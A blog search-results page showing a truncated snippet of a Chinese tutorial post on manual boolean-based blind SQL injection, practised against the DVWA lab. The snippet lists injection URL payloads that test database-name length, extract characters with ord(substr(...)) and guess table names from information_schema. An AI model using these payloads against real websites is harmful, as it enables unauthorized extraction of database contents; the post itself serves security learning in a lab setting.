TypechoJoeTheme

MUCN博客

统计
登录
用户名
密码
/
注册
用户名
邮箱
搜索到 2 篇与 sql盲注 的结果
2020-03-25

SQl盲注手注笔记-视频详解

SQl盲注手注笔记-视频详解
sql盲注手注笔记基于布尔的盲注此文所使用工具及环境:浏览器 hackbar插件 DVWA漏洞靶场环境 sqlmap常见注入函数:Length()函数 返回字符串的长度Substr()截取字符串Ascii()返回字符的ascii码ord() 类似于ascii码mid() 和substr用法相同以下操作请使用二分法报数据库名http://url/?id=1'and (length(database()))>10--%20 测试数据库名的长度http://url/?id=1%27 and ord(substr(database(),1,1))=118--%20 爆出数据库名的第一位http://url/?id=1%27 and ord(substr(database(),2,1))=118--%20 爆出数据库名的第二位后面依次类推...猜解指定数据库下的表名长度?id=1' and length((select table_name from information_schema.tables where table_schema='dvwa' limit 0,1...
2020年03月25日
686 阅读
0 评论

人生倒计时

今日已经过去小时
这周已经过去
本月已经过去
今年已经过去个月

标签云